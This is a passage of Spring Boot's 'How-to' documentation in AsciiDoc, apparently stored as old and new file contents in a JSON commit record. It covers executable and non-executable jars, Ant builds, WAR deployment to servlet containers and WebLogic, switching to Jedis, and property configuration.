executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support, which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked when the executable jar first runs. Such nested jars are written\nbeneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that\nit will not delete the jars that have been unpacked to the temporary directory while the\napplication is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven\nPlugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products,\nthe executable version has additional configuration files that are not needed in a library\njar. For example, the `application.yml` configuration file might by excluded from the\nnon-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar\nfor the library, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you\ncan use the `jvmArguments` property of the {spring-boot-maven-plugin-site}[maven plugin].\n\nSee {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using `spring-boot-antlib`\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war\narchive. To make it executable, you can either use the `spring-boot-antlib`\nmodule or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n`BOOT-INF\/classes` directory. If you are building a war, package the application's\nclasses in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n`WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\ndirectory for a jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\nentries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class`\nis available).\n. Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class`\nattribute in the manifest and specify the other properties it needs as manifest entries --\nprincipally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` file with a `manual` task that should work if you run it with the following\ncommand:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nThen you can run the application with the following command:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\n\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and\napplications are deployed by default on an embedded Reactor Netty server,\nWar deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. Doing so\nmakes use of Spring Framework's Servlet 3.0 support and lets you configure your\napplication when it is launched by the servlet container. Typically, you should update\nyour application's main class to extend `SpringBootServletInitializer`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war\nfile rather than a jar file. If you use Maven and `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you), all you need to do is to modify `pom.xml` to\nchange the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not\ninterfere with the servlet container to which the war file is deployed. To do so, you\nneed to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration. Among other\nlimitations, `compileOnly` dependencies are not on the test classpath, so any web-based\nintegration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided produces an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication by using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based\nexample] of the previously described configuration.\n\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to\na Spring Boot application. To do so, throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`. Spring MVC web applications are generally amenable to first\ncreating a deployable war application and then migrating it later to an executable war\nor jar. See the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a\nclass called `Application`) and adding the Spring Boot `@SpringBootApplication`\nannotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that, whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. The same applies to `messages.properties`\n(which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application (for instance, using other\nservlets or filters), you may need to add some configuration to your `Application`\ncontext, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\ncontainer as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a\n`<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\nyour `Application`. Alternatively, simple cases where annotation configuration is\nheavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to\nyour `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and in the `main` method in a class similar to the\nfollowing:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntechniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally, all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (for example, if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to combine all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\ncombining does not work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features usually\nneeds to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to Spring\nBoot applications, and the previously mentioned guidance may help. However, you may yet\nencounter problems. In that case, we suggest\nhttps:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow\nwith a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version\nrather than the version that was pre-installed with the server. You can do so by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttp:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses\nhttps:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce]. You need to exclude that\ndependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead. Spring\nBoot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"lettuce\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"redis.clients:jedis\")\n\t\t\/\/ ...\n\t}\n----\n","old_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' questions\nthat often arise when using Spring Boot. Its coverage is not exhaustive, but it\ndoes cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out\nhttps:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer. This is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe are also more than happy to extend this section. If you want to add a '`how-to`',\nsend us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\n\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\nin a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such an analyzer for application-context-related exceptions, JSR-303\nvalidations, and more. You can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. If, for whatever reason, you cannot handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer`\ncan simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but\nsometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You can see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` (see <<production-ready-features.adoc,the Actuator chapter>>),\nthere is also a `conditions` endpoint that renders the report in JSON. Use that endpoint\nto debug the application and see what features have been added (and which have not been\nadded) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. When\nreading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources. Pay special\nattention to the `+@Conditional*+` annotations to find out what features they enable and\nwhen. Add `--debug` to the command line or a System property `-Ddebug` to get a log on the\nconsole of all the auto-configuration decisions that were made in your app. In a running\nActuator app, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX\nequivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\nand read from there the available external configuration options. The\n`@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to\nexternal properties. Thus, `ServerProperties` has `prefix=\"server\"` and its configuration\nproperties are `server.port`, `server.address`, and others. In a running Actuator app,\nlook at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values\nexplicitly out of the `Environment` in a relaxed manner. It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\nresponse to SpEL expressions, normally evaluated with placeholders resolved from the\n`Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. There is more\nthan one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers`\nmethods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or\n`context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging\na jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some\neven before the context is created) and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n\"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>`\" in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed by using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, the following example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. The preceding example adds the `custom-resource` property\nsource at the end of the list so that a key defined in any of the usual other locations\ntakes precedence. A custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a\nconvenient and easy way to load a custom resource in the `Environment`, we do not\nrecommend it, because Spring Boot prepares the `Environment` before the\n`ApplicationContext` is refreshed. Any key defined with `@PropertySource` is loaded too\nlate to have any effect on auto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `ApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\"\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method but also bootstrap a Spring application to set up\nthe infrastructure to use, you can use the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class, depending on whether\nit thinks it needs a web application or not. The first thing you can do to help it is to\nleave server-related dependencies (e.g. servlet API) off the classpath. If you cannot do\nthat (for example, you run two applications from the same code base) then you can\nexplicitly call `setWebApplicationType(WebApplicationType.NONE)` on your\n`SpringApplication` instance or set the `applicationContextClass` property (through the\nJava API or with external properties). Application code that you want to run as your\nbusiness logic can be implemented as a `CommandLineRunner` and dropped into the context as\na `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\n\nThis section includes topics about setting and reading properties and configuration\nsettings and their interaction with Spring Boot applications.\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them by instead using the existing build\nconfiguration. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource\nfiltering. If you use the `spring-boot-starter-parent`, you can then refer to your\nMaven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is\napplied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add\n`src\/main\/resources` directly to the classpath (for hot reloading purposes). Doing so\ncircumvents the resource filtering and this feature. Instead, you can use the `exec:java`\ngoal or customize the plugin's configuration. See the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside\nthe `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring\nplaceholders (such as `${placeholder}`) in your configuration. If that property is not\nset to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the\nfollowing example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion, escape\nthe Spring property placeholders as follows: `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of `SpringApplication`\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as\nyou create the application to modify its behavior. Alternatively, you can externalize the\nconfiguration by setting properties in `+spring.main.*+`. For example, in\n`application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application is not starting\nan embedded web server.\n\nProperties defined in external configuration override the values specified with the Java\nAPI, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses\nthree sources for the `ApplicationContext` (in the following order): `demo.MyApp`,\n`com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a\ndefined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this ordering is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods and those added using `setSources()` are inspected to see if they have\n`@PropertySources`. If they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower priority than any added by using the default locations (such as\n`application.properties`), system properties, environment variables, or the command line.\n\nYou can also provide the following System properties (or environment variables) to change\nthe behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`): Defaults to `application` as the root of\nthe file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`): The file to load (such as a\nclasspath resource or a URL). A separate `Environment` property source is set up for this\ndocument and it can be overridden by system properties, environment variables, or the\ncommand line.\n\nNo matter what you set in the environment, Spring Boot always loads\n`application.properties` as described above. By default, if YAML is used, then files with\nthe '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can enable this behavior by using\nplaceholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (that is,\n`@maven.token@` instead of 